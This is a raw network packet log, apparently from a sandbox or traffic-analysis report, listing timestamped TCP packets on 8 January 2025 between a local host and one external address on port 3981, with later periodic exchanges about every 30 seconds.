                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243263006 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243351936 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243417025 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243474007 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243581057 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243612051 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243643999 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243753910 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243866920 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.243982077 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244122028 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244136095 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244244099 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244349957 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244363070 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244472980 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244590044 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244689941 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244709015 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244860888 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244863033 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.244971991 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245057106 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245059967 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245182037 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245229959 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245341063 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245419025 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245527029 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245563984 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245676994 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245714903 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245764017 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245883942 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.245995045 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246052980 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246125937 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246238947 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246267080 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246386051 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246423006 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246478081 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246583939 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246704102 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246732950 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246850967 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246903896 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.246942997 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247055054 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247098923 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247219086 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247288942 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247406960 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247442007 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247560978 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.247603893 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.297256947 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790009022 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790154934 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790270090 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790297031 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790333986 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:23.790380955 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.337629080 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.337645054 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.337724924 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.337846041 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.337960958 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.337969065 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338078976 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338141918 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338187933 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338325024 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338359118 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338573933 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338587046 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338733912 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338768959 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338803053 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338819981 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338917971 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.338989973 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339015007 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339165926 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339282036 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339333057 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339369059 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339473009 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339502096 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339613914 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339672089 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339706898 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339824915 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.339947939 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340013027 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340096951 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340177059 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340181112 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340313911 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340373039 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340409994 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340538025 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340643883 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340692997 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340802908 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340861082 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340886116 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.340998888 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341032028 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341149092 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341228008 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341342926 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341370106 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341480017 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341581106 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341696978 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341707945 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341821909 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341881990 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.341929913 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342051029 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342170954 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342219114 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342305899 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342387915 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342403889 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342514038 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342561960 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342670918 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342731953 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342747927 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342869997 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.342983007 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343071938 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343101978 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343224049 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343239069 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343352079 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343411922 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343461037 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343568087 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343686104 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343751907 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343801022 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343918085 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.343924046 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344037056 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344091892 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344208956 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344279051 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344391108 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344433069 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344571114 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344602108 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344618082 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344738007 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.344772100 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.354376078 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.354424953 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.354537964 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.354655027 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.354717016 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.354773998 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.354885101 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.354899883 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.354976892 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.355088949 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.355142117 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.355420113 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.390995026 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.391115904 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.391288042 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.392359018 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.392462969 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.392576933 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.392666101 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.393131018 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.393131018 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.884646893 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.884675026 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.884768963 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.884896994 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.884963036 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885042906 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885130882 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885157108 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885262966 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885380030 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885472059 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.885642052 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886179924 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886331081 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886439085 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886501074 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886617899 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886626959 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886742115 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886801004 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886836052 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886953115 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.886966944 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887079954 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887137890 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887212038 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887296915 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887437105 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887480021 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887552977 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887646914 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887648106 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887765884 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887816906 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887816906 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887929916 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.887986898 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888006926 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888119936 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888183117 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888235092 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888348103 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888354063 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888469934 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888520002 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888619900 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888689041 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888689041 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888698101 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888818026 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888835907 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.888946056 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889013052 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889013052 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889058113 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889177084 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889180899 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889293909 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889349937 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889400959 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889517069 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889517069 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889525890 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889642954 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889689922 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889797926 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889857054 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889857054 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889870882 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.889996052 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890031099 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890151978 CET39814974943.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:13:24.890203953 CET497493981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:16:36.927393913 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:16:36.929805040 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:16:37.517059088 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:06.959630013 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:06.961354017 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:07.549362898 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:36.995198011 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:36.997176886 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:17:37.584182024 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:07.026336908 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:07.078686953 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:07.122087002 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:07.708060026 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:37.054759026 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:37.056418896 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:18:37.642831087 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:07.082339048 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:07.083571911 CET497483981192.168.11.2043.226.229.196
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:07.671482086 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:37.122301102 CET39814974843.226.229.196192.168.11.20
                                                                                                                                                                                                                                    Jan 8, 2025 17:19:37.122737885 CET497483981192.168.11.2043.226.229.196
